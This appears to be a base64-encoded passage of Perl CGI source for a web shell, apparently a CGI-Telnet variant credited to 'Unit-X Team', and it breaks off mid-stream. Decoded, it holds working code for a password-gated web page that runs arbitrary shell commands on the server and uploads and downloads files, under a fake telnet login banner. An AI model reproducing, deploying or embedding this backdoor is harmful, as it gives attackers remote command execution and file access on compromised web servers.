LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgTG9naW4gU2NyZWVuDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRMb2dpblNjcmVlbg0Kew0KCSRNZXNzYWdlID0gcSQ8cHJlPjxmb250IGNvbG9yPSIjZmYwMDAwIj4gX19fX18gIF9fX19fICBfX19fXyAgICAgICAgICBfX19fXyAgICAgICAgXyAgICAgICAgICAgICAgIF8NCi8gIF9fIFx8ICBfXyBcfF8gICBffCAgICAgICAgfF8gICBffCAgICAgIHwgfCAgICAgICAgICAgICB8IHwNCnwgLyAgXC98IHwgIFwvICB8IHwgICBfX19fX18gICB8IHwgICAgX19fIHwgfCBfIF9fICAgIF9fXyB8IHxfDQp8IHwgICAgfCB8IF9fICAgfCB8ICB8X19fX19ffCAgfCB8ICAgLyBfIFx8IHx8ICdfIFwgIC8gXyBcfCBfX3wNCnwgXF9fL1x8IHxfXCBcIF98IHxfICAgICAgICAgICB8IHwgIHwgIF9fL3wgfHwgfCB8IHx8ICBfXy98IHxfDQogXF9fX18vIFxfX19fLyBcX19fLyAgICAgICAgICAgXF8vICAgXF9fX3x8X3x8X3wgfF98IFxfX198IFxfX3wgMS4wDQoNCjwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+ICAgICAgICAgICAgICAgICAgICAgIF9fX19fXyAgICAgICAgICAgICA8L2ZvbnQ+PGZvbnQgY29sb3I9IiNBRTgzMDAiPqkgMjAwMywgVW5pdC1YIFRlYW08L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPg0KICAgICAgICAgICAgICAgICAgIC4tJnF1b3Q7ICAgICAgJnF1b3Q7LS4NCiAgICAgICAgICAgICAgICAgIC8gICBVTklULVggICBcDQogICAgICAgICAgICAgICAgIHwgICAgICAgICAgICAgIHwNCiAgICAgICAgICAgICAgICAgfCwgIC4tLiAgLi0uICAsfA0KICAgICAgICAgICAgICAgICB8ICkoX28vICBcb18pKCB8DQogICAgICAgICAgICAgICAgIHwvICAgICAvXCAgICAgXHwNCiAgICAgICAoQF8gICAgICAgKF8gICAgIF5eICAgICBfKQ0KICBfICAgICApIFw8L2ZvbnQ+PGZvbnQgY29sb3I9IiMwMDk5MDAiPl9fX19fX188L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPlw8L2ZvbnQ+PGZvbnQgY29sb3I9IiMwMDk5MDAiPl9fPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj58KkVWSUwqfDwvZm9udD48Zm9udCBjb2xvcj0iIzAwOTkwMCI+X188L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPi88L2ZvbnQ+PGZvbnQgY29sb3I9IiMwMDk5MDAiPl9fX19fX19fX19fX19fX19fX19fX19fDQo8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPiAoXyk8L2ZvbnQ+PGZvbnQgY29sb3I9IiMwMDk5MDAiPkA4QDg8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPnt9PC9mb250Pjxmb250IGNvbG9yPSIjMDA5OTAwIj4mbHQ7X19fX19fX188L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPnwtXE1BU1RFUi8tfDwvZm9udD48Zm9udCBjb2xvcj0iIzAwOTkwMCI+X19fX19fX19fX19fX19fX19fX19fX19fJmd0OzwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+DQogICAgICAgIClfLyAgICAgICAgXCAgICAgICAgICAvDQogICAgICAgKEAgICAgICAgICAgIGAtLS0tLS0tLWANCiAgICAgICAgICAgICA8L2ZvbnQ+PGZvbnQgY29sb3I9IiNBRTgzMDAiPlcgQSBSIE4gSSBOIEc6IFByaXZhdGUgU2VydmVyPC9mb250PjwvcHJlPg0KJDsNCiMnDQoJcHJpbnQgPDxFTkQ7DQo8Y29kZT4NClRyeWluZyAkU2VydmVyTmFtZS4uLjxicj4NCkNvbm5lY3RlZCB0byAkU2VydmVyTmFtZTxicj4NCkVzY2FwZSBjaGFyYWN0ZXIgaXMgXl0NCjxjb2RlPiRNZXNzYWdlDQpFTkQNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIG1lc3NhZ2UgdGhhdCBpbmZvcm1zIHRoZSB1c2VyIG9mIGEgZmFpbGVkIGxvZ2luDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRMb2dpbkZhaWxlZE1lc3NhZ2UNCnsNCglwcmludCA8PEVORDsNCjxjb2RlPg0KPGJyPmxvZ2luOiBhZG1pbjxicj4NCnBhc3N3b3JkOjxicj4NCkxvZ2luIGluY29ycmVjdDxicj48YnI+DQo8L2NvZGU+DQpFTkQNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSBmb3IgbG9nZ2luZyBpbg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50TG9naW5Gb3JtDQp7DQoJcHJpbnQgPDxFTkQ7DQo8Y29kZT4NCjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImxvZ2luIj4NCmxvZ2luOiBhZG1pbjxicj4NCnBhc3N3b3JkOjxpbnB1dCB0eXBlPSJwYXNzd29yZCIgbmFtZT0icCI+DQo8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRW50ZXIiPg0KPC9mb3JtPg0KPC9jb2RlPg0KRU5EDQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgUHJpbnRzIHRoZSBmb290ZXIgZm9yIHRoZSBIVE1MIFBhZ2UNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludFBhZ2VGb290ZXINCnsNCglwcmludCAiPC9mb250PjwvYm9keT48L2h0bWw+IjsNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBSZXRyZWl2ZXMgdGhlIHZhbHVlcyBvZiBhbGwgY29va2llcy4gVGhlIGNvb2tpZXMgY2FuIGJlIGFjY2Vzc2VzIHVzaW5nIHRoZQ0KIyB2YXJpYWJsZSAkQ29va2llc3snJ30NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBHZXRDb29raWVzDQp7DQoJQGh0dHBjb29raWVzID0gc3BsaXQoLzsgLywkRU5WeydIVFRQX0NPT0tJRSd9KTsNCglmb3JlYWNoICRjb29raWUoQGh0dHBjb29raWVzKQ0KCXsNCgkJKCRpZCwgJHZhbCkgPSBzcGxpdCgvPS8sICRjb29raWUpOw0KCQkkQ29va2llc3skaWR9ID0gJHZhbDsNCgl9DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgUHJpbnRzIHRoZSBzY3JlZW4gd2hlbiB0aGUgdXNlciBsb2dzIG91dA0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50TG9nb3V0U2NyZWVuDQp7DQoJcHJpbnQgIjxjb2RlPkNvbm5lY3Rpb24gY2xvc2VkIGJ5IGZvcmVpZ24gaG9zdC48YnI+PGJyPjwvY29kZT4iOw0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIExvZ3Mgb3V0IHRoZSB1c2VyIGFuZCBhbGxvd3MgdGhlIHVzZXIgdG8gbG9naW4gYWdhaW4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQZXJmb3JtTG9nb3V0DQp7DQoJcHJpbnQgIlNldC1Db29raWU6IFNBVkVEUFdEPTtcbiI7ICMgcmVtb3ZlIHBhc3N3b3JkIGNvb2tpZQ0KCSZQcmludFBhZ2VIZWFkZXIoInAiKTsNCgkmUHJpbnRMb2dvdXRTY3JlZW47DQoJJlByaW50TG9naW5TY3JlZW47DQoJJlByaW50TG9naW5Gb3JtOw0KCSZQcmludFBhZ2VGb290ZXI7DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gbG9naW4gdGhlIHVzZXIuIElmIHRoZSBwYXNzd29yZCBtYXRjaGVzLCBpdA0KIyBkaXNwbGF5cyBhIHBhZ2UgdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gcnVuIGNvbW1hbmRzLiBJZiB0aGUgcGFzc3dvcmQgZG9lbnMndA0KIyBtYXRjaCBvciBpZiBubyBwYXNzd29yZCBpcyBlbnRlcmVkLCBpdCBkaXNwbGF5cyBhIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXINCiMgdG8gbG9naW4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQZXJmb3JtTG9naW4NCnsNCglpZigkTG9naW5QYXNzd29yZCBlcSAkUGFzc3dvcmQpICMgcGFzc3dvcmQgbWF0Y2hlZA0KCXsNCgkJcHJpbnQgIlNldC1Db29raWU6IFNBVkVEUFdEPSRMb2dpblBhc3N3b3JkO1xuIjsNCgkJJlByaW50UGFnZUhlYWRlcigiYyIpOw0KCQkmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgl9DQoJZWxzZSAjIHBhc3N3b3JkIGRpZG4ndCBtYXRjaA0KCXsNCgkJJlByaW50UGFnZUhlYWRlcigicCIpOw0KCQkmUHJpbnRMb2dpblNjcmVlbjsNCgkJaWYoJExvZ2luUGFzc3dvcmQgbmUgIiIpICMgc29tZSBwYXNzd29yZCB3YXMgZW50ZXJlZA0KCQl7DQoJCQkmUHJpbnRMb2dpbkZhaWxlZE1lc3NhZ2U7DQoJCX0NCgkJJlByaW50TG9naW5Gb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCX0NCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSB0aGF0IGFsbG93cyB0aGUgdXNlciB0byBlbnRlciBjb21tYW5kcw0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50Q29tbWFuZExpbmVJbnB1dEZvcm0NCnsNCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCglwcmludCA8PEVORDsNCjxjb2RlPg0KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iY29tbWFuZCI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPg0KJFByb21wdA0KPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImMiPg0KPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4NCjwvZm9ybT4NCjwvY29kZT4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIGRvd25sb2FkIGZpbGVzDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRGaWxlRG93bmxvYWRGb3JtDQp7DQoJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7DQoJcHJpbnQgPDxFTkQ7DQo8Y29kZT4NCjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZCIgdmFsdWU9IiRDdXJyZW50RGlyIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJkb3dubG9hZCI+DQokUHJvbXB0IGRvd25sb2FkPGJyPjxicj4NCkZpbGVuYW1lOiA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0iZiIgc2l6ZT0iMzUiPjxicj48YnI+DQpEb3dubG9hZDogPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkJlZ2luIj4NCjwvZm9ybT4NCjwvY29kZT4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIHVwbG9hZCBmaWxlcw0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50RmlsZVVwbG9hZEZvcm0NCnsNCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCglwcmludCA8PEVORDsNCjxjb2RlPg0KPGZvcm0gbmFtZT0iZiIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+DQokUHJvbXB0IHVwbG9hZDxicj48YnI+DQpGaWxlbmFtZTogPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImYiIHNpemU9IjM1Ij48YnI+PGJyPg0KT3B0aW9uczogJm5ic3A7PGlucHV0IHR5cGU9ImNoZWNrYm94IiBuYW1lPSJvIiB2YWx1ZT0ib3ZlcndyaXRlIj4NCk92ZXJ3cml0ZSBpZiBpdCBFeGlzdHM8YnI+PGJyPg0KVXBsb2FkOiZuYnNwOyZuYnNwOyZuYnNwOzxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJCZWdpbiI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9InVwbG9hZCI+DQo8L2Zvcm0+DQo8L2NvZGU+DQpFTkQNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB0aW1lb3V0IGZvciBhIGNvbW1hbmQgZXhwaXJlcy4gV2UgbmVlZCB0bw0KIyB0ZXJtaW5hdGUgdGhlIHNjcmlwdCBpbW1lZGlhdGVseS4gVGhpcyBmdW5jdGlvbiBpcyB2YWxpZCBvbmx5IG9uIFVuaXguIEl0IGlzDQojIG5ldmVyIGNhbGxlZCB3aGVuIHRoZSBzY3JpcHQgaXMgcnVubmluZyBvbiBOVC4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBDb21tYW5kVGltZW91dA0Kew0KCWlmKCEkV2luTlQpDQoJew0KCQlhbGFybSgwKTsNCgkJcHJpbnQgPDxFTkQ7DQo8L3htcD4NCjxjb2RlPg0KQ29tbWFuZCBleGNlZWRlZCBtYXhpbXVtIHRpbWUgb2YgJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gc2Vjb25kKHMpLg0KPGJyPktpbGxlZCBpdCENCjxjb2RlPg0KRU5EDQoJCSZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCQlleGl0Ow0KCX0NCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB0byBleGVjdXRlIGNvbW1hbmRzLiBJdCBkaXNwbGF5cyB0aGUgb3V0cHV0IG9mIHRoZQ0KIyBjb21tYW5kIGFuZCBhbGxvd3MgdGhlIHVzZXIgdG8gZW50ZXIgYW5vdGhlciBjb21tYW5kLiBUaGUgY2hhbmdlIGRpcmVjdG9yeQ0KIyBjb21tYW5kIGlzIGhhbmRsZWQgZGlmZmVyZW50bHkuIEluIHRoaXMgY2FzZSwgdGhlIG5ldyBkaXJlY3RvcnkgaXMgc3RvcmVkIGluDQojIGFuIGludGVybmFsIHZhcmlhYmxlIGFuZCBpcyB1c2VkIGVhY2ggdGltZSBhIGNvbW1hbmQgaGFzIHRvIGJlIGV4ZWN1dGVkLiBUaGUNCiMgb3V0cHV0IG9mIHRoZSBjaGFuZ2UgZGlyZWN0b3J5IGNvbW1hbmQgaXMgbm90IGRpc3BsYXllZCB0byB0aGUgdXNlcnMNCiMgdGhlcmVmb3JlIGVycm9yIG1lc3NhZ2VzIGNhbm5vdCBiZSBkaXNwbGF5ZWQuDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgRXhlY3V0ZUNvbW1hbmQNCnsNCglpZigkUnVuQ29tbWFuZCA9fiBtL15ccypjZFxzKyguKykvKSAjIGl0IGlzIGEgY2hhbmdlIGRpciBjb21tYW5kDQoJew0KCQkjIHdlIGNoYW5nZSB0aGUgZGlyZWN0b3J5IGludGVybmFsbHkuIFRoZSBvdXRwdXQgb2YgdGhlDQoJCSMgY29tbWFuZCBpcyBub3QgZGlzcGxheWVkLg0KDQoJCSRPbGREaXIgPSAkQ3VycmVudERpcjsNCgkJJENvbW1hbmQgPSAiY2QgXCIkQ3VycmVudERpclwiIi4kQ21kU2VwLiJjZCAkMSIuJENtZFNlcC4kQ21kUHdkOw0KCQljaG9wKCRDdXJyZW50RGlyID0gYCRDb21tYW5kYCk7DQoJCSZQcmludFBhZ2VIZWFkZXIoImMiKTsNCgkJJFByb21wdCA9ICRXaW5OVCA/ICIkT2xkRGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJE9sZERpcl1cJCAiOw0KCQlwcmludCAiPGNvZGU+JFByb21wdCAkUnVuQ29tbWFuZDwvY29kZT4iOw0KCX0NCgllbHNlICMgc29tZSBvdGhlciBjb21tYW5kLCBkaXNwbGF5IHRoZSBvdXRwdXQNCgl7DQoJCSZQcmludFBhZ2VIZWFkZXIoImMiKTsNCgkJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7DQoJCXByaW50ICI8Y29kZT4kUHJvbXB0ICRSdW5Db21tYW5kPC9jb2RlPjx4bXA+IjsNCgkJJENvbW1hbmQgPSAiY2QgXCIkQ3VycmVudERpclwiIi4kQ21kU2VwLiRSdW5Db21tYW5kLiRSZWRpcmVjdG9yOw0KCQlpZighJFdpbk5UKQ0KCQl7DQoJCQkkU0lHeydBTFJNJ30gPSBcJkNvbW1hbmRUaW1lb3V0Ow0KCQkJYWxhcm0oJENvbW1hbmRUaW1lb3V0RHVyYXRpb24pOw0KCQl9DQoJCWlmKCRTaG93RHluYW1pY091dHB1dCkgIyBzaG93IG91dHB1dCBhcyBpdCBpcyBnZW5lcmF0ZWQNCgkJew0KCQkJJHw9MTsNCgkJCSRDb21tYW5kIC49ICIgfCI7DQoJCQlvcGVuKENvbW1hbmRPdXRwdXQsICRDb21tYW5kKTsNCgkJCXdoaWxlKDxDb21tYW5kT3V0cHV0PikNCgkJCXsNCgkJCQkkXyA9fiBzLyhcbnxcclxuKSQvLzsNCgkJCQlwcmludCAiJF9cbiI7DQoJCQl9DQoJCQkkfD0wOw0KCQl9DQoJCWVsc2UgIyBzaG93IG91dHB1dCBhZnRlciBjb21tYW5kIGNvbXBsZXRlcw0KCQl7DQoJCQlwcmludCBgJENvbW1hbmRgOw0KCQl9DQoJCWlmKCEkV2luTlQpDQoJCXsNCgkJCWFsYXJtKDApOw0KCQl9DQoJCXByaW50ICI8L3htcD4iOw0KCX0NCgkmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsNCgkmUHJpbnRQYWdlRm9vdGVyOw0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gZGlzcGxheXMgdGhlIHBhZ2UgdGhhdCBjb250YWlucyBhIGxpbmsgd2hpY2ggYWxsb3dzIHRoZSB1c2VyDQojIHRvIGRvd25sb2FkIHRoZSBzcGVjaWZpZWQgZmlsZS4gVGhlIHBhZ2UgYWxzbyBjb250YWlucyBhIGF1dG8tcmVmcmVzaA0KIyBmZWF0dXJlIHRoYXQgc3RhcnRzIHRoZSBkb3dubG9hZCBhdXRvbWF0aWNhbGx5Lg0KIyBBcmd1bWVudCAxOiBGdWxseSBxdWFsaWZpZWQgZmlsZW5hbWUgb2YgdGhlIGZpbGUgdG8gYmUgZG93bmxvYWRlZA0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50RG93bmxvYWRMaW5rUGFnZQ0Kew0KCWxvY2FsKCRGaWxlVXJsKSA9IEBfOw0KCWlmKC1lICRGaWxlVXJsKSAjIGlmIHRoZSBmaWxlIGV4aXN0cw0KCXsNCgkJIyBlbmNvZGUgdGhlIGZpbGUgbGluayBzbyB3ZSBjYW4gc2VuZCBpdCB0byB0aGUgYnJvd3Nlcg0KCQkkRmlsZVVybCA9fiBzLyhbXmEtekEtWjAtOV0pLyclJy51bnBhY2soIkgqIiwkMSkvZWc7DQoJCSREb3dubG9hZExpbmsgPSAiJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxvYWQmZj0kRmlsZVVybCZvPWdvIjsNCgkJJEh0bWxNZXRhSGVhZGVyID0gIjxtZXRhIEhUVFAtRVFVSVY9XCJSZWZyZXNoXCIgQ09OVEVOVD1cIjE7IFVSTD0kRG93bmxvYWRMaW5rXCI+IjsNCgkJJlByaW50UGFnZUhlYWRlcigiYyIpOw0KCQlwcmludCA8PEVORDsNCjxjb2RlPg0KU2VuZGluZyBGaWxlICRUcmFuc2ZlckZpbGUuLi48YnI+DQpJZiB0aGUgZG93bmxvYWQgZG9lcyBub3Qgc3RhcnQgYXV0b21hdGljYWxseSwNCjxhIGhyZWY9IiREb3dubG9hZExpbmsiPkNsaWNrIEhlcmU8L2E+Lg0KPC9jb2RlPg0KRU5EDQoJCSZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCX0NCgllbHNlICMgZmlsZSBkb2Vzbid0IGV4aXN0DQoJew0KCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7DQoJCXByaW50ICI8Y29kZT5GYWlsZWQgdG8gZG93bmxvYWQgJEZpbGVVcmw6ICQhPC9jb2RlPiI7DQoJCSZQcmludEZpbGVEb3dubG9hZEZvcm07DQoJCSZQcmludFBhZ2VGb290ZXI7DQoJfQ0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gcmVhZHMgdGhlIHNwZWNpZmllZCBmaWxlIGZyb20gdGhlIGRpc2sgYW5kIHNlbmRzIGl0IHRvIHRoZQ0KIyBicm93c2VyLCBzbyB0aGF0IGl0IGNhbiBiZSBkb3dubG9hZGVkIGJ5IHRoZSB1c2VyLg0KIyBBcmd1bWVudCAxOiBGdWxseSBxdWFsaWZpZWQgcGF0aG5hbWUgb2YgdGhlIGZpbGUgdG8gYmUgc2VudC4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBTZW5kRmlsZVRvQnJvd3Nlcg0Kew0KCWxvY2FsKCRTZW5kRmlsZSkgPSBAXzsNCglpZihvcGVuKFNFTkRGSUxFLCAkU2VuZEZpbGUpKSAjIGZpbGUgb3BlbmVkIGZvciByZWFkaW5nDQoJew0KCQlpZigkV2luTlQpDQoJCXsNCgkJCWJpbm1vZGUoU0VOREZJTEUpOw0KCQkJYmlubW9kZShTVERPVVQpOw0KCQl9DQoJCSRGaWxlU2l6ZSA9IChzdGF0KCRTZW5kRmlsZSkpWzddOw0KCQkoJEZpbGVuYW1lID0gJFNlbmRGaWxlKSA9fiAgbSEoW14vXlxcXSopJCE7DQoJCXByaW50ICJDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtdW5rbm93blxuIjsNCgkJcHJpbnQgIkNvbnRlbnQtTGVuZ3RoOiAkRmlsZVNpemVcbiI7DQoJCXByaW50ICJDb250ZW50LURpc3Bvc2l0aW9uOiBhdHRhY2htZW50OyBmaWxlbmFtZT0kMVxuXG4iOw0KCQlwcmludCB3aGlsZSg8U0VOREZJTEU+KTsNCgkJY2xvc2UoU0VOREZJTEUpOw0KCX0NCgllbHNlICMgZmFpbGVkIHRvIG9wZW4gZmlsZQ0KCXsNCgkJJlByaW50UGFnZUhlYWRlcigiZiIpOw0KCQlwcmludCAiPGNvZGU+RmFpbGVkIHRvIGRvd25sb2FkICRTZW5kRmlsZTogJCE8L